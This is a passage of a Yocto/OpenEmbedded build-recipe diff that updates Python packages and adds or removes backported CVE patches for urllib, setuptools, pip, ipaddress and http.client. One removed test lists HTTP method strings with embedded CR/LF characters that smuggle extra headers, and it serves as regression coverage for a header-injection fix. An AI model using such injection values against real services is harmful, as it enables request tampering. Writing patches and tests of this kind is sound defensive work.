- # end of section 2, and section 1.2 immediately after "credentials"
-@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
- self.passwd = password_mgr
- self.add_password = self.passwd.add_password
-
-+ def _parse_realm(self, header):
-+ # parse WWW-Authenticate header: accept multiple challenges per header
-+ found_challenge = False
-+ for mo in AbstractBasicAuthHandler.rx.finditer(header):
-+ scheme, quote, realm = mo.groups()
-+ if quote not in ['"', "'"]:
-+ warnings.warn("Basic Auth Realm was unquoted",
-+ UserWarning, 3)
-+
-+ yield (scheme, realm)
-+
-+ found_challenge = True
-+
-+ if not found_challenge:
-+ if header:
-+ scheme = header.split()[0]
-+ else:
-+ scheme = ''
-+ yield (scheme, None)
-+
- def http_error_auth_reqed(self, authreq, host, req, headers):
- # host may be an authority (without userinfo) or a URL with an
- # authority
-- # XXX could be multiple headers
-- authreq = headers.get(authreq, None)
-+ headers = headers.get_all(authreq)
-+ if not headers:
-+ # no header found
-+ return
-
-- if authreq:
-- scheme = authreq.split()[0]
-- if scheme.lower() != 'basic':
-- raise ValueError("AbstractBasicAuthHandler does not"
-- " support the following scheme: '%s'" %
-- scheme)
-- else:
-- mo = AbstractBasicAuthHandler.rx.search(authreq)
-- if mo:
-- scheme, quote, realm = mo.groups()
-- if quote not in ['"',"'"]:
-- warnings.warn("Basic Auth Realm was unquoted",
-- UserWarning, 2)
-- if scheme.lower() == 'basic':
-- return self.retry_http_basic_auth(host, req, realm)
-+ unsupported = None
-+ for header in headers:
-+ for scheme, realm in self._parse_realm(header):
-+ if scheme.lower() != 'basic':
-+ unsupported = scheme
-+ continue
-+
-+ if realm is not None:
-+ # Use the first matching Basic challenge.
-+ # Ignore following challenges even if they use the Basic
-+ # scheme.
-+ return self.retry_http_basic_auth(host, req, realm)
-+
-+ if unsupported is not None:
-+ raise ValueError("AbstractBasicAuthHandler does not "
-+ "support the following scheme: %r"
-+ % (scheme,))
-
- def retry_http_basic_auth(self, host, req, realm):
- user, pw = self.passwd.find_user_password(realm, host)
-diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-new file mode 100644
-index 0000000000..be80ce79d9
---- /dev/null
-+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-@@ -0,0 +1,3 @@
-+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
-+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
-+per header: use the realm of the first Basic challenge.
-diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-new file mode 100644
-index 0000000000..9f2800581c
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-@@ -0,0 +1,5 @@
-+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
-+:mod:`urllib.request` module uses an inefficient regular expression which can
-+be exploited by an attacker to cause a denial of service. Fix the regex to
-+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
-+and Matt Schwager.
---
-2.24.1
-
diff --git a/meta/recipes-devtools/python/python-setuptools.inc b/meta/recipes-devtools/python/python-setuptools.inc
index 29be852f66..5faf62bc3a 100644
--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
inherit pypi
+SRC_URI += " file://CVE-2022-40897.patch "
+
SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"
diff --git a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
index 89538d2f27..9f054c6024 100644
--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
+HOMEPAGE = "https://pypi.org/project/Jinja2/"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
-SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0"
+SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
PYPI_PACKAGE = "Jinja2"
+CVE_PRODUCT = "jinja2 jinja"
+
CLEANBROKEN = "1"
inherit pypi setuptools3
diff --git a/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
index 698016ba4c..b73310c808 100644
--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
-RDEPENDS_${PN} += "file"
+DEPENDS_append_class-native = " file-replacement-native"
+
+RDEPENDS_${PN} += "file \
+ ${PYTHON_PN}-ctypes \
+ ${PYTHON_PN}-io \
+ ${PYTHON_PN}-shell"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
new file mode 100644
index 0000000000..a38ab57bc6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
+From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 09:52:43 +0530
+Subject: [PATCH] CVE-2021-3572
+
+Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
+CVE: CVE-2021-3572
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ news/9827.bugfix.rst | 3 +++
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+ create mode 100644 news/9827.bugfix.rst
+
+diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
+new file mode 100644
+index 0000000..e0d27c3
+--- /dev/null
++++ b/news/9827.bugfix.rst
+@@ -0,0 +1,3 @@
++**SECURITY**: Stop splitting on unicode separators in git references,
++which could be maliciously used to install a different revision on the
++repository.
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303..1b895f6 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+ output = cls.run_command(['show-ref', rev], cwd=dest,
+ show_stdout=False, on_returncode='ignore')
+ refs = {}
+- for line in output.strip().splitlines():
++ # NOTE: We do not use splitlines here since that would split on other
++ # unicode separators, which can be maliciously used to install a
++ # different revision.
++ for line in output.strip().split("\n"):
++ line = line.rstrip("\r")
++ if not line:
++ continue
+ try:
+- sha, ref = line.split()
++ ref_sha, ref_name = line.split(" ", maxsplit=2)
+ except ValueError:
+ # Include the offending line to simplify troubleshooting if
+ # this error ever occurs.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 08738fb2f9..e24c6f4477 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
DEPENDS += "python3 python3-setuptools-native"
+SRC_URI = "file://CVE-2021-3572.patch "
SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
diff --git a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
index 8f60834c17..8452d7fa9f 100644
--- a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
+++ b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
@@ -18,7 +18,7 @@ SRC_URI[sha256sum] = "4f5ba9374a46c98729dd3727d993f5e17ed0286fd6738ed464fe4efa06
S = "${WORKDIR}/pycairo-${PV}"
-inherit meson pkgconfig
+inherit meson pkgconfig python3targetconfig
CFLAGS += "-fPIC"
diff --git a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
index 6babf0cae8..29825492b9 100644
--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python GObject bindings"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
+DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
SECTION = "devel/python"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-devtools/python/python3-scons_3.1.2.bb b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
index ce117a92d4..12122131a5 100644
--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Software Construction tool (make/autotools replacement)"
+HOMEPAGE = "https://github.com/SCons/scons"
SECTION = "devel/python"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"
diff --git a/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
new file mode 100644
index 0000000000..9150cea07e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
+From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
+From: "Jason R. Coombs" <jaraco@jaraco.com>
+Date: Fri, 4 Nov 2022 13:47:53 -0400
+Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
+ #3659.
+
+CVE: CVE-2022-40897
+Upstream-Status: Backport [
+Upstream : https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
+Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
+]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ setuptools/package_index.py | 2 +-
+ setuptools/tests/test_packageindex.py | 1 -
+ 2 files changed, 1 insertion(+), 2 deletions(-)
+
+--- setuptools-45.2.0.orig/setuptools/package_index.py
++++ setuptools-45.2.0/setuptools/package_index.py
+@@ -215,7 +215,7 @@ def unique_values(func):
+ return wrapper
+
+
+-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
++REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
+ # this line is here to fix emacs' cruddy broken syntax highlighting
+
+
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+
+Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
+
+Signed-off-by: Tim Orling <tim.orling@konsulko.com>
---
configure.ac | 175 +++++++--------------------------------------------
1 file changed, 21 insertions(+), 154 deletions(-)
diff --git a/configure.ac b/configure.ac
-index ede710e..bc81b0b 100644
+index de83332dd3..16b02d0798 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -710,160 +710,27 @@ fi
- MULTIARCH=$($CC --print-multiarch 2>/dev/null)
- AC_SUBST(MULTIARCH)
+@@ -719,160 +719,27 @@ then
+ fi
+
-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
-cat >> conftest.c <<EOF
@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
+## Need to handle macos, vxworks and hurd special (?) :-/
+case ${target_os} in
+ darwin*)
-+ PLATFORM_TRIPLET=darwin
-+ ;;
++ PLATFORM_TRIPLET=darwin
++ ;;
+ hurd*)
-+ PLATFORM_TRIPLET=i386-gnu
-+ ;;
++ PLATFORM_TRIPLET=i386-gnu
++ ;;
+ vxworks*)
-+ PLATFORM_TRIPLET=vxworks
-+ ;;
++ PLATFORM_TRIPLET=vxworks
++ ;;
+ *)
+ if test "${target_cpu}" != "i686"; then
-+ PLATFORM_TRIPLET=${target_cpu}-${target_os}
-+ else
-+ PLATFORM_TRIPLET=i386-${target_os}
-+ fi
-+ ;;
-+esac
++ PLATFORM_TRIPLET=${target_cpu}-${target_os}
++ else
++ PLATFORM_TRIPLET=i386-${target_os}
++ fi
++ ;;
++esac
- if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then
- if test x$PLATFORM_TRIPLET != x$MULTIARCH; then
+ if test x$PLATFORM_TRIPLET != xdarwin; then
+ MULTIARCH=$($CC --print-multiarch 2>/dev/null)
--
-2.24.1
+2.32.0
diff --git a/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
new file mode 100644
index 0000000000..a44d3396a6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
+From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
+From: Tim Orling <timothy.t.orling@intel.com>
+Date: Fri, 18 Jun 2021 11:56:50 -0700
+Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
+
+These tests need full packagegroup-core-buildessential, the
+easiest way to dynamically check for that is looking for
+'tools-sdk' in IMAGE_FEATURES.
+
+Upstream-Status: Inappropriate [oe-specific]
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ Lib/ctypes/test/test_find.py | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
+index 92ac184..0d009d1 100644
+--- a/Lib/ctypes/test/test_find.py
++++ b/Lib/ctypes/test/test_find.py
+@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
+ # LD_LIBRARY_PATH)
+ self.assertEqual(find_library(libname), 'lib%s.so' % libname)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_gcc(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
+ self.assertNotEqual(find_library('c'), None)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_ld(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
+ unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
-From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001
-From: Mingli Yu <mingli.yu@windriver.com>
-Date: Mon, 5 Aug 2019 15:57:39 +0800
+From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
+From: Tim Orling <ticotimo@gmail.com>
+Date: Wed, 16 Jun 2021 07:49:52 -0700
Subject: [PATCH] test_locale.py: correct the test output format
Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+
+
+Refresh patch for upstream changes in 3.8.9
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
---
Lib/test/test_locale.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
-index e2c2178..558d63c 100644
+index 39091c0..5050f3d 100644
--- a/Lib/test/test_locale.py
+++ b/Lib/test/test_locale.py
-@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase):
+@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
self.skipTest('test needs Turkish locale')
loc = locale.getlocale(locale.LC_CTYPE)
if verbose:
- print('testing with %a' % (loc,), end=' ', flush=True)
+ print('testing with %a...' % (loc,), end=' ', flush=True)
- locale.setlocale(locale.LC_CTYPE, loc)
- self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE))
-
---
-2.7.4
-
+ try:
+ locale.setlocale(locale.LC_CTYPE, loc)
+ except locale.Error as exc:
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Mon, 29 Jun 2020 11:12:50 -0700
-Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
- IPv6Interface (GH-21033)
-
-The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
-of generating constant hash values of 32 and 128 respectively causing hash collisions.
-The fix uses the hash() function to generate hash values for the objects
-instead of XOR operation
-(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
-
-Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
-CVE: CVE-2020-14422
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Lib/ipaddress.py | 4 ++--
- Lib/test/test_ipaddress.py | 12 ++++++++++++
- .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst | 1 +
- 3 files changed, 15 insertions(+), 2 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-
-diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
-index 873c7644081af..a3a04f7f4b309 100644
---- a/Lib/ipaddress.py
-+++ b/Lib/ipaddress.py
-@@ -1370,7 +1370,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-@@ -2017,7 +2017,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
-index de77111705b69..2eba740e5e7a4 100644
---- a/Lib/test/test_ipaddress.py
-+++ b/Lib/test/test_ipaddress.py
-@@ -2053,6 +2053,18 @@ def testsixtofour(self):
- sixtofouraddr.sixtofour)
- self.assertFalse(bad_addr.sixtofour)
-
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV4HashIsNotConstant(self):
-+ ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
-+ ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
-+ self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
-+
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV6HashIsNotConstant(self):
-+ ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
-+ ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
-+ self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
-+
-
- if __name__ == '__main__':
- unittest.main()
-diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-new file mode 100644
-index 0000000000000..1380b31fbe9f4
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-@@ -0,0 +1 @@
-+The __hash__() methods of ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Sat, 18 Jul 2020 13:39:12 -0700
-Subject: [PATCH] bpo-39603: Prevent header injection in http methods
- (GH-18485)
-
-reject control chars in http method in http.client.putrequest to prevent http header injection
-(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
-
-Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
-CVE: CVE-2020-26116
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
----
- Lib/http/client.py | 15 +++++++++++++
- Lib/test/test_httplib.py | 22 +++++++++++++++++++
- .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst | 2 ++
- 3 files changed, 39 insertions(+)
- create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-
-diff --git a/Lib/http/client.py b/Lib/http/client.py
-index 019380a720318..c2ad0471bfee5 100644
---- a/Lib/http/client.py
-+++ b/Lib/http/client.py
-@@ -147,6 +147,10 @@
- # _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
- # We are more lenient for assumed real world compatibility purposes.
-
-+# These characters are not allowed within HTTP method names
-+# to prevent http header injection.
-+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
-+
- # We always set the Content-Length header for these methods because some
- # servers will otherwise respond with a 411
- _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
-@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
- else:
- raise CannotSendRequest(self.__state)
-
-+ self._validate_method(method)
-+
- # Save the method for use later in the response phase
- self._method = method
-
-@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
- # ASCII also helps prevent CVE-2019-9740.
- return request.encode('ascii')
-
-+ def _validate_method(self, method):
-+ """Validate a method name for putrequest."""
-+ # prevent http header injection
-+ match = _contains_disallowed_method_pchar_re.search(method)
-+ if match:
-+ raise ValueError(
-+ f"method can't contain control characters. {method!r} "
-+ f"(found at least {match.group()!r})")
-+
- def _validate_path(self, url):
- """Validate a url for putrequest."""
- # Prevent CVE-2019-9740.
-diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
-index 8f0e27a1fb836..5a5fcecbc9c15 100644
---- a/Lib/test/test_httplib.py
-+++ b/Lib/test/test_httplib.py
-@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
- self.assertEqual(lines[3], "header: Second: val2")
-
-
-+class HttpMethodTests(TestCase):
-+ def test_invalid_method_names(self):
-+ methods = (
-+ 'GET\r',
-+ 'POST\n',
-+ 'PUT\n\r',
-+ 'POST\nValue',
-+ 'POST\nHOST:abc',
-+ 'GET\nrHost:abc\n',
-+ 'POST\rRemainder:\r',
-+ 'GET\rHOST:\n',
-+ '\nPUT'
-+ )
-+
-+ for method in methods:
-+ with self.assertRaisesRegex(
-+ ValueError, "method can't contain control characters"):
-+ conn = client.HTTPConnection('example.com')
-+ conn.sock = FakeSocket(None)
-+ conn.request(method=method, url="/")
-+
-+
- class TransferEncodingTest(TestCase):
- expected_body = b"It's just a flesh wound"
-
-diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-new file mode 100644
-index 0000000000000..990affc3edd9d
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-@@ -0,0 +1,2 @@
-+Prevent http header injection by rejecting control characters in
-+http.client.putrequest(...).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
-From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
-Date: Tue, 6 Oct 2020 05:38:54 -0700
-Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
- in the CJK codec tests (GH-22566) (GH-22577)
-
-(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
-CVE: CVE-2020-27619
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- Lib/test/multibytecodec_support.py | 22 +++++++------------
- .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst | 1 +
- 2 files changed, 9 insertions(+), 14 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-
-diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
-index cca8af67d6d1d..f76c0153f5ecf 100644
---- a/Lib/test/multibytecodec_support.py
-+++ b/Lib/test/multibytecodec_support.py
-@@ -305,29 +305,23 @@ def test_mapping_file(self):
- self._test_mapping_file_plain()
-
- def _test_mapping_file_plain(self):
-- unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
-+ def unichrs(s):
-+ return ''.join(chr(int(x, 16)) for x in s.split('+'))
-+
- urt_wa = {}
-
- with self.open_mapping_file() as f:
- for line in f:
- if not line:
- break
-- data = line.split('#')[0].strip().split()
-+ data = line.split('#')[0].split()
- if len(data) != 2:
- continue
-
-- csetval = eval(data[0])
-- if csetval <= 0x7F:
-- csetch = bytes([csetval & 0xff])
-- elif csetval >= 0x1000000:
-- csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
-- ((csetval >> 8) & 0xff), (csetval & 0xff)])
-- elif csetval >= 0x10000:
-- csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
-- (csetval & 0xff)])
-- elif csetval >= 0x100:
-- csetch = bytes([(csetval >> 8), (csetval & 0xff)])
-- else:
-+ if data[0][:2] != '0x':
-+ self.fail(f"Invalid line: {line!r}")
-+ csetch = bytes.fromhex(data[0][2:])
-+ if len(csetch) == 1 and 0x80 <= csetch[0]:
- continue
-
- unich = unichrs(data[1])
-diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-new file mode 100644
-index 0000000000000..4f9782f1c85af
---- /dev/null
-+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-@@ -0,0 +1 @@
